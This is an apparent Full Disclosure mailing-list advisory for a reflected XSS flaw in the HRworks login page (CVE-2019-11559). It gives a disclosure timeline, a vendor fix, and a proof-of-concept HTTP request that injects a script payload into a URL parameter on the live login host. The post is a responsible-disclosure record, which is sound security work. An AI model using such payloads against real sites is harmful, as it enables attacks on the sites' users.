Message-ID: <hrQCrKo1hdx11wxj5JgnYKRuJv4QPQQ4CamolgI77D1R69t4nJKPVAaT4nECphjKleKdI2EmCOMOMpqGz9roMmpKZKV1ru8cPS5T9ccO62o=@protonmail.com>
Date: Wed, 18 Sep 2019 09:51:06 +0000
From: Georg Ph E Heise via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Reflected XSS – HRworks Login (v1.16.1)

# Exploit Title: Reflected XSS – HRworks Login (v1.16.1)

# Vendor Homepage: https://www.hrworks.de

# Exploit Author: Georg Philipp Erasmus Heise / Lufthansa Industry Solutions

# Contact: https://twitter.com/gpheheise

# Website: https://www.lufthansa-industry-solutions.com

# Category: webapps

# CVE: CVE-2019-11559

Timeline

26.04.2019 Disclosure to Vendor

29.04.2019 Vendor informed that the issue was remediated

17.09.2019 Publication

1. Description:

The URL parameter of the login page accepts unfiltered input, which leads to several variants of reflected XSS.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11559

2. Proof of Concept:

Vulnerable Source

http://login.hrworks.de

PoC

GET /?re44h"-alert(1)-"bb8rf=1 HTTP/1.1

Host: login.hrworks.de

Accept-Encoding: gzip, deflate

Accept: */*

3. Solution:

As of the date of publication, all versions above 1.16.3 are safe to use.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
